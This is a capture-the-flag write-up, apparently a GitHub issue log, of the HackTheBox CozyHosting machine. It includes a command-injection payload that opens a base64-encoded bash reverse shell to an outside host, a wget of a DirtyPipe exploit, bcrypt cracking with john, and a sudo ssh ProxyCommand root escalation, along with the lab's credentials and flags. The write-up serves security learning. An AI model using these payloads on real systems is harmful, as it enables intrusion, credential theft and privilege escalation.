roaris / ctf-log


HackTheBox: CozyHosting (Machine Easy) #41

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/CozyHosting

$ nmap -sC -sV -Pn 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-15 23:46 JST
Nmap scan report for 10.10.11.230
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.78 seconds
roaris commented 6 months ago

Accessing http://10.10.11.230 redirects to http://cozyhosting.htb, so add the following to /etc/hosts

10.10.11.230 cozyhosting.htb
roaris commented 6 months ago

I keep losing connectivity to the machine every so often, so I can't run gobuster

$ ping 10.10.11.230
PING 10.10.11.230 (10.10.11.230) 56(84) bytes of data.
64 bytes from 10.10.11.230: icmp_seq=1 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=2 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=3 ttl=63 time=174 ms
64 bytes from 10.10.11.230: icmp_seq=4 ttl=63 time=173 ms
64 bytes from 10.10.11.230: icmp_seq=5 ttl=63 time=173 ms
...
64 bytes from 10.10.11.230: icmp_seq=33 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=34 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=35 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=36 ttl=63 time=1039 ms
64 bytes from 10.10.11.230: icmp_seq=37 ttl=63 time=172 ms
64 bytes from 10.10.11.230: icmp_seq=162 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=163 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=164 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=165 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=166 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=167 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=168 ttl=63 time=169 ms
64 bytes from 10.10.11.230: icmp_seq=169 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=170 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=171 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=172 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=173 ttl=63 time=170 ms
64 bytes from 10.10.11.230: icmp_seq=174 ttl=63 time=170 ms
^C
--- 10.10.11.230 ping statistics ---
174 packets transmitted, 50 received, 71.2644% packet loss, time 178057ms
rtt min/avg/max/mdev = 169.201/187.777/1038.978/121.606 ms
roaris commented 6 months ago

Restarting WSL and restarting the machine didn't change anything. The connection to the machine also keeps dropping from Pwnbox. This didn't happen until yesterday...

roaris commented 6 months ago

REGENERATE VPN fixed it

roaris commented 6 months ago

Directory enumeration

$ gobuster dir --url http://cozyhosting.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 12706]
/login                (Status: 200) [Size: 4431]
/admin                (Status: 401) [Size: 97]
/logout               (Status: 204) [Size: 0]
/error                (Status: 500) [Size: 73]
/http%3A%2F%2Fwww     (Status: 400) [Size: 435]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 435]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 435]
/http%3A%2F%2Fblog    (Status: 400) [Size: 435]
/%C0                  (Status: 400) [Size: 435]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 435]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

Subdomain enumeration

$ gobuster vhost --url http://cozyhosting.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://cozyhosting.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 100000 / 100001 (100.00%)
===============================================================
Finished
===============================================================

Nothing of interest

roaris commented 6 months ago

There is no X-Powered-By header among the response headers. I tried SQL injection on POST /login, but it didn't work

Looking at the page source, all I can tell is that Bootstrap is used

roaris commented 6 months ago

I'm stuck, so Guided Mode

Task1 : How many TCP ports are open on CozyHosting? A : 2

Task2 : The webserver on TCP port 80 issues a redirect to what domain? A : cozyhosting.htb

Task3 : What relative path on the webserver returns a 500 error? A : /error

So this is what to focus on. I'd only thought of it as a plain error page


It says Whitelabel Error Page

https://terakoya.sejuku.net/question/detail/32947

The Whitelabel Error Page is the default error page that a Spring Boot application shows when no error page has been configured. The reason this error appears is that the application has no error page configured.

Apparently. I'd think that only tells us Spring Boot is in use, but how does this lead to compromising the box?

roaris commented 6 months ago

Task4 : What is the Java web framework used in the web application? A : Spring Boot

Task5 : What endpoint is exposed in Spring Boot and is mainly used for debugging purposes? Hint : Fuzz the endpoint using a Spring Boot specific wordlist.

There's a wordlist specifically for Spring Boot?

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt

Run gobuster with it

$ gobuster dir --url http://cozyhosting.htb --wordlist /usr/share/SecLists/Discovery/Web-Content/spring-boot.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://cozyhosting.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/spring-boot.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/actuator             (Status: 200) [Size: 634]
/actuator/env/lang    (Status: 200) [Size: 487]
/actuator/env/home    (Status: 200) [Size: 487]
/actuator/env         (Status: 200) [Size: 4957]
/actuator/env/path    (Status: 200) [Size: 487]
/actuator/health      (Status: 200) [Size: 15]
/actuator/mappings    (Status: 200) [Size: 9938]
/actuator/beans       (Status: 200) [Size: 127224]
/actuator/sessions    (Status: 200) [Size: 48]
Progress: 112 / 113 (99.12%)
===============================================================
Finished
===============================================================

Looking at /actuator/sessions, there's something that looks like a session ID

After overwriting the JSESSIONID cookie with this apparent session ID and accessing http://cozyhosting.htb/login, I was able to access http://cozyhosting.htb/admin


A : /actuator. The answer to the task was /actuator


roaris commented 6 months ago

There's nowhere to execute commands or inject scripts

While examining the URLs gobuster found, the POST /executessh entry in /actuator/mappings caught my eye, but I don't know what kind of request to send to it

/actuator/beans has a lot in it, but searching it for version didn't turn up the Spring Boot version

POST /executessh turned out to be the request sent from the Include host into automatic patching section of http://cozyhosting.htb/admin. Sending host=example.com&username=kanderson → displays ssh: Could not resolve hostname example.com: Temporary failure in name resolution. Sending host=127.0.0.1&username=kanderson → displays Host key verification failed.

It says "For Cozy Scanner to connect the private key that you received upon registration should be included in your host's .ssh/authorised_keys file." Is that a typo for .ssh/authorized_keys? Also, .ssh/authorized_keys is where you register public keys, not private ones

roaris commented 6 months ago

Stuck again, so Guided Mode. Task6 : What is the username of the user's whose session is exposed? A : kanderson

Task7 : When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection? Hint : The injection is blind, use out-of-band techniques like sleep or making the target connect to your box.

POST /executessh is command-injectable? How would you even notice that

https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#command-injection

Based on the error message, and that it said it’s using a private key, it seems likely that the server is running ssh -i [key] [username]@[hostname] to connect. If that’s the case, I can test for command injection vulnerabilities.

Well, once it's pointed out it makes sense, but I wouldn't have come up with it on my own

roaris commented 6 months ago

Check whether command injection is possible by making it sleep

Sending host=127.0.0.1%3Bsleep+5%3B%23&username=kanderson (host : 127.0.0.1;sleep 5;#, username : kanderson) → Invalid hostname!

Sending host=a&username=kanderson%40127.0.0.1%3Bsleep+5%3B%23 (host : a, username : kanderson@127.0.0.1;sleep 5;#) → Username can't contain whitespaces!

https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#command-injection

There are a couple ways to get whitespace without spaces in a Linux terminal context. I’ll use ${IFS} as a Bash environment variable that is a space

So there's such a thing as ${IFS}

Sending host=a&username=kanderson%40127.0.0.1%3Bsleep%24%7BIFS%7D5%3B%23 (host : a, username : kanderson@127.0.0.1;sleep${IFS}5;#) → after a pause, Host key verification failed. is displayed

Task7 : When a POST request is sent to /executessh, which of the two parameters is vulnerable to command injection? Hint : The injection is blind, use out-of-band techniques like sleep or making the target connect to your box. A : username
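As an added example (not the application's own code, nor from any of the write-ups linked here), this Java sketch shows why a whitespace blocklist in front of a shell string lets kanderson@127.0.0.1;sleep${IFS}5;# through, and how an allowlist plus a shell-free ProcessBuilder argv closes it. The class name ExecuteSsh, the method names and the key path /app/cozy.key are assumptions.

```java
import java.util.List;
import java.util.regex.Pattern;

// Added illustration, not the CozyHosting application's source. It sketches the shape an
// /executessh-style handler would need to have for the behaviour seen on the page
// (whitespace blocklist, ${IFS} bypass) and a hardened version that passes argv without a shell.
// Class, method and key-path names are assumptions.
public class ExecuteSsh {

    // Vulnerable shape (inferred, not the real code): reject literal whitespace, then splice
    // both parameters into one command line that bash parses. "kanderson@127.0.0.1;sleep${IFS}5;#"
    // contains no whitespace, so it passes, and bash expands ${IFS} to a space when it runs.
    static List<String> vulnerableCommand(String host, String username) {
        if (host.contains(";") || host.contains(" ")) {
            throw new IllegalArgumentException("Invalid hostname!");
        }
        if (username.matches(".*\\s.*")) {
            throw new IllegalArgumentException("Username can't contain whitespaces!");
        }
        String cmd = "ssh -i /app/cozy.key " + username + "@" + host;  // key path is a placeholder
        return List.of("/bin/bash", "-c", cmd);  // the shell re-parses ; # ${IFS} | > inside cmd
    }

    // Hardened shape: allowlist both parameters, then hand ssh an argv list. ProcessBuilder
    // execs the program directly, so no shell ever interprets the values.
    private static final Pattern USERNAME = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");
    private static final Pattern HOSTNAME = Pattern.compile(
        "^(?=.{1,253}$)([A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?\\.)*"
        + "[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$");

    static List<String> hardenedCommand(String host, String username) {
        if (!USERNAME.matcher(username).matches()) {
            throw new IllegalArgumentException("Invalid username");
        }
        if (!HOSTNAME.matcher(host).matches()) {
            throw new IllegalArgumentException("Invalid hostname!");
        }
        // One argv element per argument; "--" keeps a value from being read as an ssh option.
        return List.of("ssh", "-i", "/app/cozy.key", "-o", "BatchMode=yes",
                       "-o", "StrictHostKeyChecking=yes", "--", username + "@" + host, "true");
    }

    // Launch without a shell: argv elements reach ssh exactly as built above.
    static Process run(List<String> argv) throws java.io.IOException {
        return new ProcessBuilder(argv).redirectErrorStream(true).start();
    }

    public static void main(String[] args) {
        String injected = "kanderson@127.0.0.1;sleep${IFS}5;#";  // the test input from the page
        System.out.println("vulnerable accepts: " + vulnerableCommand("a", injected));
        try {
            hardenedCommand("a", injected);
        } catch (IllegalArgumentException e) {
            System.out.println("hardened rejects: " + e.getMessage());
        }
        System.out.println("hardened argv: " + hardenedCommand("127.0.0.1", "kanderson"));
    }
}
```

The lesson a defender should take is that filtering characters in front of bash -c is a losing game; removing the shell from the call path is what makes the validation hold.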

roaris commented 6 months ago

Getting a reverse shell. Sending host=a&username=kanderson%40127.0.0.1%3Bbash%24%7BIFS%7D-i%24%7BIFS%7D%3E%26%24%7BIFS%7D%2Fdev%2Ftcp%2F10.10.14.50%2F4444%24%7BIFS%7D0%3E%261%3B%23 (host : a, username : kanderson@127.0.0.1;bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.10.14.50/4444${IFS}0>&1;#) doesn't work. It redirects to http://cozyhosting.htb/admin?error=Host key verification failed./bin/bash: line 1: ${IFS}/dev/tcp/10.10.14.50/4444${IFS}0: ambiguous redirect and returns a 400

What is an ambiguous redirect...

roaris commented 6 months ago

https://medium.com/@aniketdas07770/hackthebox-cozyhosting-writeup-61e832873e68 The ambiguous redirect is still a mystery, but apparently using base64 works

$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK

Sending host=a&username=kanderson%40127.0.0.1%3becho%24%7bIFS%7d%22YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA%2bJjEK%22%7cbase64%24%7bIFS%7d-d%7cbash%3b%23 (host : a, username : kanderson@127.0.0.1;echo${IFS}"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK"|base64${IFS}-d|bash;#)

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from cozyhosting.htb [10.10.11.230] 57028
bash: cannot set terminal process group (1066): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$

Got a reverse shell

roaris commented 6 months ago

Can't move into /home/josh

app@cozyhosting:/app$ ls -l /home
ls -l /home
total 4
drwxr-x--- 3 josh josh 4096 Aug  8  2023 josh

Nothing of interest in /var/www

app@cozyhosting:/app$ ls -al /var/www
ls -al /var/www
total 12
drwxr-xr-x  3 root root 4096 May  9  2023 .
drwxr-xr-x 13 root root 4096 Aug 14  2023 ..
drwxr-xr-x  2 root root 4096 May  9  2023 html

sudo -l doesn't give anything either

app@cozyhosting:/app$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

Could CVE-2022-0847 be usable? https://security.sios.jp/vulnerability/kernel-security-vulnerability-20220309/

app@cozyhosting:/app$ uname -sr
uname -sr
Linux 5.15.0-82-generic
roaris commented 6 months ago

Found https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits. It has to be compiled, but there's no gcc on the machine, so I compiled it on the Kali Linux side, copied it over to the machine and ran it there. I couldn't create files in /app, so I put it in /tmp

app@cozyhosting:/tmp$ wget http://10.10.14.50:8000/exploit-2
wget http://10.10.14.50:8000/exploit-2
--2024-05-16 19:20:17--  http://10.10.14.50:8000/exploit-2
Connecting to 10.10.14.50:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17288 (17K) [application/octet-stream]
Saving to: ‘exploit-2’

     0K .......... ......                                     100% 97.1K=0.2s

2024-05-16 19:20:18 (97.1 KB/s) - ‘exploit-2’ saved [17288/17288]

app@cozyhosting:/tmp$ chmod +x exploit-2
chmod +x exploit-2
app@cozyhosting:/tmp$ ./exploit-2 /usr/bin/sudo
./exploit-2 /usr/bin/sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-ABknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-ABknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-ABbEHknPS] [-r role] [-t type] [-C num] [-D directory] [-g group]
            [-h host] [-p prompt] [-R directory] [-T timeout] [-u user]
            [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-ABknS] [-r role] [-t type] [-C num] [-D directory] [-g group]
            [-h host] [-p prompt] [-R directory] [-T timeout] [-u user] file ...
sh: 1: /tmp/sh: not found
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))

I don't really understand how to use it

roaris commented 6 months ago

Stuck, so Guided Mode. Task8 : What user is the web application running as? A : app

Task9 : What is the full path to the Java file that runs the web application? Hint : It should be very close to where our reverse shell starts. A : /app/cloudhosting-0.0.1.jar

Task10 : What is the name of the file where application-related properties are stored in a Spring Boot application?

jar is short for Java archive https://wa3.i-3-i.info/word14171.html Apparently you extract a jar with jar -xvf <jar file>. There was no jar command on the machine. python3 is available, so I used python3 -m http.server to bring the file to my local machine and extracted it there

roaris commented 6 months ago

grepping for password hit a file called application.properties

server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR

Task10 : What is the name of the file where application-related properties are stored in a Spring Boot application? A : application.properties
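As an added example, not the file extracted from the jar: the exposure settings above placed next to the tightened values a defender would want, so that the sessions endpoint that leaked kanderson's JSESSIONID and the env endpoint are no longer reachable through nginx. The port 9090 and the environment variable name DB_PASSWORD are assumed.

```properties
# Added illustration, not the application.properties from the machine.

# As found on CozyHosting: env, sessions and mappings are all served over the public HTTP port,
# and the sessions endpoint is switched on explicitly.
#management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
#management.endpoint.sessions.enabled = true

# Tightened: expose only health on the web, keep the sessions endpoint disabled (Spring Boot's
# default), and move whatever actuator remains to a management port bound to loopback that the
# nginx front end does not proxy.
management.endpoints.web.exposure.include=health
management.endpoint.sessions.enabled=false
management.server.port=9090
management.server.address=127.0.0.1

# Keep the DB password out of the jar: resolve it from the environment at startup instead of
# shipping the literal value (DB_PASSWORD is an assumed variable name).
spring.datasource.password=${DB_PASSWORD}
```

With only health exposed, the spring-boot.txt wordlist run above would return 404 for /actuator/env, /actuator/sessions and /actuator/mappings.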

roaris commented 6 months ago

Connect with the psql command https://www.tohoho-web.com/ex/postgresql.html#psql Stabilize the shell first

app@cozyhosting:/app$ psql -h localhost -U postgres -d postgres
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

postgres=#

Apparently there are no tables in the postgres database

postgres=# \dt
Did not find any relations.
postgres=# \l
WARNING: terminal is not fully functional
Press RETURN to continue
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)

(END)

Typing \l froze the shell, so I start over

app@cozyhosting:/app$ psql -h localhost -U postgres -d cozyhosting
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# \dt
WARNING: terminal is not fully functional
Press RETURN to continue
         List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

(END)

Found out there's a users table. The shell froze again, so I start over

roaris commented 6 months ago

app@cozyhosting:/app$ psql -h localhost -U postgres -d cozyhosting
Password for user postgres:
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

cozyhosting=# select * from users;
WARNING: terminal is not fully functional
Press RETURN to continue
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)

(END)

They're hashed with bcrypt, so use john the ripper to recover the original passwords. kanderson's original password didn't come out, but admin's did

$ cat hash.txt
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manchesterunited (?)
1g 0:00:00:12 DONE (2024-05-17 05:06) 0.07806g/s 224.8p/s 224.8c/s 224.8C/s onlyme..soccer9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
roaris commented 6 months ago

Can't log in via ssh. Tried admin / root / administrator / Admin, but...

Apparently it's josh

$ ssh josh@10.10.11.230
josh@10.10.11.230's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May 16 08:06:29 PM UTC 2024

  System load:           0.0
  Usage of /:            53.5% of 5.42GB
  Memory usage:          26%
  Swap usage:            0%
  Processes:             266
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.230
  IPv6 address for eth0: dead:beef::250:56ff:feb9:14f3

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Aug 29 09:03:34 2023 from 10.10.14.41
josh@cozyhosting:~$
roaris commented 6 months ago

Got user.txt

josh@cozyhosting:~$ ls
user.txt
josh@cozyhosting:~$ cat user.txt
47f348e35478a293fdaa86ceb1547e9f
roaris commented 6 months ago

/usr/bin/ssh can be run with root privileges, but you can't get a root shell out of that, can you?

josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
roaris commented 6 months ago

Apparently you use ProxyCommand https://0xdf.gitlab.io/2024/03/02/htb-cozyhosting.html#execution It's used to ssh directly to a host across a bastion server https://dev.classmethod.jp/articles/direct-ssh-by-proxycommand/

roaris commented 6 months ago

With sudo ssh -oProxyCommand='/bin/bash' a, the shell doesn't respond. The hostname part is a, but this time it's enough that ProxyCommand gets executed, so I left it arbitrary

Even after setting setuid on /bin/bash and running it, I'm still the josh user. Strange

josh@cozyhosting:~$ sudo ssh -oProxyCommand='chmod u+s /bin/bash' a
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
josh@cozyhosting:~$ /bin/bash
bash-5.1$ whoami
josh
bash-5.1$ cd /root
bash: cd: /root: Permission denied

Starting bash with the p option started it as root. Searching for the p option didn't turn anything up. Got root.txt

josh@cozyhosting:~$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
bash-5.1# cat root.txt
6086562917fcf0eaa68f81a71ab3cf4a
roaris commented 6 months ago

Solution summary

  1. Notice from the Whitelabel Error Page that Spring Boot is in use
  2. Run directory enumeration with the Spring Boot wordlist
  3. Use the session ID listed in /actuator/sessions to access /admin
  4. OS command injection via POST /executessh to run a reverse shell. Guess from the name /executessh that the ssh command is being executed. Including a space causes an error, so use ${IFS}. Trying to run the reverse shell gives a mysterious "ambiguous redirect" error, but using base64 works
  5. Bring the jar file in /app on the machine to the local machine and extract it
  6. grep for password and find the PostgreSQL credentials
  7. Stabilize the shell and access PostgreSQL
  8. The DB contains bcrypt-hashed passwords, so recover the original password with john the ripper and ssh in as josh. Got user.txt
  9. sudo -l shows the ssh command can be run with root privileges
  10. Use ssh's ProxyCommand to set setuid on /bin/bash, then run bash -p to escalate to root (without -p you stay as josh)

I don't feel I could solve this on my own. Step 4 in particular is far too hard